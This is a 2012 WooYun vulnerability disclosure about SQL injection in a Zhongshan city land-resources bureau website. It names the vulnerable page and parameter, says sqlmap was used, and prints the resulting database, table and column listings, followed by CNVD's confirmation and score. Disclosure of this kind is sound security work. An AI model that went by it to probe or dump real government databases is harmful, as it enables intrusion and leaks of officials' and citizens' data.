当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06942

漏洞标题:中山市国土资源局存在严重注入大量信息泄露

相关厂商:中山市国土资源局

漏洞作者: FlyR4nk

提交时间:2012-05-11 15:17

修复时间:2012-06-25 15:17

公开时间:2012-06-25 15:17

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-11: 细节已通知厂商并且等待厂商处理中
2012-05-14: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向核心白帽子及相关领域专家公开
2012-06-03: 细节向普通白帽子公开
2012-06-13: 细节向实习白帽子公开
2012-06-25: 细节向公众公开

简要描述:

中山市国土资源局存在严重注入,可以获得管理员密码,获取房产等敏感信息。

详细说明:

http://www.zsfdc.gov.cn/MessageList.aspx?id=16467存在注入。


用sqlmap直接注入之。

漏洞证明:

数据库信息:

available databases [8]:
[*] gtzyzx1110
[*] jysweb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
表信息:
Database: gtzyzx1110
[35 tables]
+--------------------------+
| dbo."成交$"                  |
| dbo."需要转成交$"                  |
| dbo.Acl_map              |
| dbo.ApplyZWPublic        |
| dbo.Article              |
| dbo.Auction              |
| dbo.BgList               |
| dbo.Bgtype               |
| dbo.Category             |
| dbo.Dic_State            |
| dbo.Dic_Type             |
| dbo.FlowNumber           |
| dbo.Guestbook            |
| dbo.Guestbook_Categories |
| dbo.Items                |
| dbo.LogText              |
| dbo.Media                |
| dbo.MediaCategories      |
| dbo.Menus                |
| dbo.OfficType            |
| dbo.Office               |
| dbo.OfficeDirect         |
| dbo.Subjects             |
| dbo.Topics               |
| dbo.UserGroup            |
| dbo.Users                |
| dbo.VideoMedia           |
| dbo.WebLinks             |
| dbo.ZwgkmlClass          |
| dbo.ZwgkmlContent        |
| dbo.dtproperties         |
| dbo.modules              |
| dbo.placename            |
| dbo.sysconstraints       |
| dbo.syssegments          |
+--------------------------+
Database: Northwind
Table: dbo."Quarterly Orders"
[4 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| City        | nvarchar |
| CompanyName | nvarchar |
| Country     | nvarchar |
| CustomerID  | nchar    |
+-------------+----------+
Database: Northwind
Table: dbo.syssegments
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| name    | varchar |
| segment | int     |
| status  | int     |
+---------+---------+
Database: Northwind
Table: dbo."Sales by Category"
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| CategoryID   | int      |
| CategoryName | nvarchar |
| ProductName  | nvarchar |
| ProductSales | money    |
+--------------+----------+
Database: Northwind
Table: dbo."Products by Category"
[5 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CategoryName    | nvarchar |
| Discontinued    | bit      |
| ProductName     | nvarchar |
| QuantityPerUnit | nvarchar |
| UnitsInStock    | smallint |
+-----------------+----------+
Database: Northwind
Table: dbo.CustomerDemographics
[2 columns]
+----------------+-------+
| Column         | Type  |
+----------------+-------+
| CustomerDesc   | ntext |
| CustomerTypeID | nchar |
+----------------+-------+
Database: Northwind
Table: dbo."Order Subtotals"
[2 columns]
+----------+-------+
| Column   | Type  |
+----------+-------+
| OrderID  | int   |
| Subtotal | money |
+----------+-------+
Database: Northwind
Table: dbo."Category Sales for 1997"
[2 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| CategoryName  | nvarchar |
| CategorySales | money    |
+---------------+----------+
Database: Northwind
Table: dbo."Sales Totals by Amount"
[4 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| CompanyName | nvarchar |
| OrderID     | int      |
| SaleAmount  | money    |
| ShippedDate | datetime |
+-------------+----------+
Database: Northwind
Table: dbo.sysconstraints
[7 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| actions | int      |
| colid   | smallint |
| constid | int      |
| error   | int      |
| id      | int      |
| spare1  | tinyint  |
| status  | int      |
+---------+----------+
Database: Northwind
Table: dbo."Current Product List"
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| ProductID   | int      |
| ProductName | nvarchar |
+-------------+----------+
Database: Northwind
Table: dbo."Order Details"
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| Discount  | real     |
| OrderID   | int      |
| ProductID | int      |
| Quantity  | smallint |
| UnitPrice | money    |
+-----------+----------+
Database: Northwind
Table: dbo."Customer and Suppliers by City"
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| City         | nvarchar |
| CompanyName  | nvarchar |
| ContactName  | nvarchar |
| Relationship | varchar  |
+--------------+----------+
Database: Northwind
Table: dbo.Region
[2 columns]
+-------------------+-------+
| Column            | Type  |
+-------------------+-------+
| RegionDescription | nchar |
| RegionID          | int   |
+-------------------+-------+
Database: Northwind
Table: dbo."Summary of Sales by Quarter"
[3 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| OrderID     | int      |
| ShippedDate | datetime |
| Subtotal    | money    |
+-------------+----------+
Database: Northwind
Table: dbo.Customers
[11 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Address      | nvarchar |
| City         | nvarchar |
| CompanyName  | nvarchar |
| ContactName  | nvarchar |
| ContactTitle | nvarchar |
| Country      | nvarchar |
| CustomerID   | nchar    |
| Fax          | nvarchar |
| Phone        | nvarchar |
| PostalCode   | nvarchar |
| Region       | nvarchar |
+--------------+----------+
Database: Northwind
Table: dbo."Product Sales for 1997"
[3 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| CategoryName | nvarchar |
| ProductName  | nvarchar |
| ProductSales | money    |
+--------------+----------+
Database: Northwind
Table: dbo."Products Above Average Price"
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| ProductName | nvarchar |
| UnitPrice   | money    |
+-------------+----------+
Database: Northwind
Table: dbo.Territories
[3 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| RegionID             | int      |
| TerritoryDescription | nchar    |
| TerritoryID          | nvarchar |
+----------------------+----------+
Database: Northwind
Table: dbo.CustomerCustomerDemo
[2 columns]
+----------------+-------+
| Column         | Type  |
+----------------+-------+
| CustomerID     | nchar |
| CustomerTypeID | nchar |
+----------------+-------+
Database: Northwind
Table: dbo."Orders Qry"
[20 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Address        | nvarchar |
| City           | nvarchar |
| CompanyName    | nvarchar |
| Country        | nvarchar |
| CustomerID     | nchar    |
| EmployeeID     | int      |
| Freight        | money    |
| OrderDate      | datetime |
| OrderID        | int      |
| PostalCode     | nvarchar |
| Region         | nvarchar |
| RequiredDate   | datetime |
| ShipAddress    | nvarchar |
| ShipCity       | nvarchar |
| ShipCountry    | nvarchar |
| ShipName       | nvarchar |
| ShippedDate    | datetime |
| ShipPostalCode | nvarchar |
| ShipRegion     | nvarchar |
| ShipVia        | int      |
+----------------+----------+
Database: Northwind
Table: dbo.Shippers
[3 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| CompanyName | nvarchar |
| Phone       | nvarchar |
| ShipperID   | int      |
+-------------+----------+
Database: Northwind
Table: dbo."Alphabetical list of products"
[11 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CategoryID      | int      |
| CategoryName    | nvarchar |
| Discontinued    | bit      |
| ProductID       | int      |
| ProductName     | nvarchar |
| QuantityPerUnit | nvarchar |
| ReorderLevel    | smallint |
| SupplierID      | int      |
| UnitPrice       | money    |
| UnitsInStock    | smallint |
| UnitsOnOrder    | smallint |
+-----------------+----------+
Database: Northwind
Table: dbo.Employees
[18 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| Address         | nvarchar |
| BirthDate       | datetime |
| City            | nvarchar |
| Country         | nvarchar |
| EmployeeID      | int      |
| Extension       | nvarchar |
| FirstName       | nvarchar |
| HireDate        | datetime |
| HomePhone       | nvarchar |
| LastName        | nvarchar |
| Notes           | ntext    |
| Photo           | image    |
| PhotoPath       | nvarchar |
| PostalCode      | nvarchar |
| Region          | nvarchar |
| ReportsTo       | int      |
| Title           | nvarchar |
| TitleOfCourtesy | nvarchar |
+-----------------+----------+
Database: Northwind
Table: dbo."Order Details Extended"
[7 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| Discount      | real     |
| ExtendedPrice | money    |
| OrderID       | int      |
| ProductID     | int      |
| ProductName   | nvarchar |
| Quantity      | smallint |
| UnitPrice     | money    |
+---------------+----------+
Database: Northwind
Table: dbo."Summary of Sales by Year"
[3 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| OrderID     | int      |
| ShippedDate | datetime |
| Subtotal    | money    |
+-------------+----------+
Database: Northwind
Table: dbo.Suppliers
[12 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Address      | nvarchar |
| City         | nvarchar |
| CompanyName  | nvarchar |
| ContactName  | nvarchar |
| ContactTitle | nvarchar |
| Country      | nvarchar |
| Fax          | nvarchar |
| HomePage     | ntext    |
| Phone        | nvarchar |
| PostalCode   | nvarchar |
| Region       | nvarchar |
| SupplierID   | int      |
+--------------+----------+
Database: Northwind
Table: dbo.Invoices
[26 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Address        | nvarchar |
| City           | nvarchar |
| Country        | nvarchar |
| CustomerID     | nchar    |
| CustomerName   | nvarchar |
| Discount       | real     |
| ExtendedPrice  | money    |
| Freight        | money    |
| OrderDate      | datetime |
| OrderID        | int      |
| PostalCode     | nvarchar |
| ProductID      | int      |
| ProductName    | nvarchar |
| Quantity       | smallint |
| Region         | nvarchar |
| RequiredDate   | datetime |
| Salesperson    | nvarchar |
| ShipAddress    | nvarchar |
| ShipCity       | nvarchar |
| ShipCountry    | nvarchar |
| ShipName       | nvarchar |
| ShippedDate    | datetime |
| ShipperName    | nvarchar |
| ShipPostalCode | nvarchar |
| ShipRegion     | nvarchar |
| UnitPrice      | money    |
+----------------+----------+
Database: Northwind
Table: dbo.EmployeeTerritories
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| EmployeeID  | int      |
| TerritoryID | nvarchar |
+-------------+----------+
Database: Northwind
Table: dbo.D99_CMD
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| Data   | varchar |
| ID     | int     |
+--------+---------+
Database: Northwind
Table: dbo.D99_Tmp
[3 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| depth        | varchar |
| file         | varchar |
| subdirectory | varchar |
+--------------+---------+
Database: Northwind
Table: dbo.Orders
[14 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| CustomerID     | nchar    |
| EmployeeID     | int      |
| Freight        | money    |
| OrderDate      | datetime |
| OrderID        | int      |
| RequiredDate   | datetime |
| ShipAddress    | nvarchar |
| ShipCity       | nvarchar |
| ShipCountry    | nvarchar |
| ShipName       | nvarchar |
| ShippedDate    | datetime |
| ShipPostalCode | nvarchar |
| ShipRegion     | nvarchar |
| ShipVia        | int      |
+----------------+----------+
Database: Northwind
Table: dbo.Categories
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| CategoryID   | int      |
| CategoryName | nvarchar |
| Description  | ntext    |
| Picture      | image    |
+--------------+----------+
Database: Northwind
Table: dbo.Products
[10 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CategoryID      | int      |
| Discontinued    | bit      |
| ProductID       | int      |
| ProductName     | nvarchar |
| QuantityPerUnit | nvarchar |
| ReorderLevel    | smallint |
| SupplierID      | int      |
| UnitPrice       | money    |
| UnitsInStock    | smallint |
| UnitsOnOrder    | smallint |
+-----------------+----------+


好怕,很多信息就不贴了。收工吧!

修复方案:

过滤!!!!!

版权声明:转载请注明来源 FlyR4nk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2012-05-14 15:01

厂商回复:

CNVD确认并复现所述漏洞情况,转由CNCERT广东分中心协调涉事单位处置。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:C/A:N/I:P/B:N) score:8.47(最高10分,中危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性造成完全影响,对完整性造成部分影响。
技术难度系数:1.0(参数并列使用,这个好象不常见)
影响危害系数:1.3(较严重,涉及地市级政府部门,且存在信息泄露风险)
CNVD综合评分:8.47*1.0*1.3=11.011

最新状态:

暂无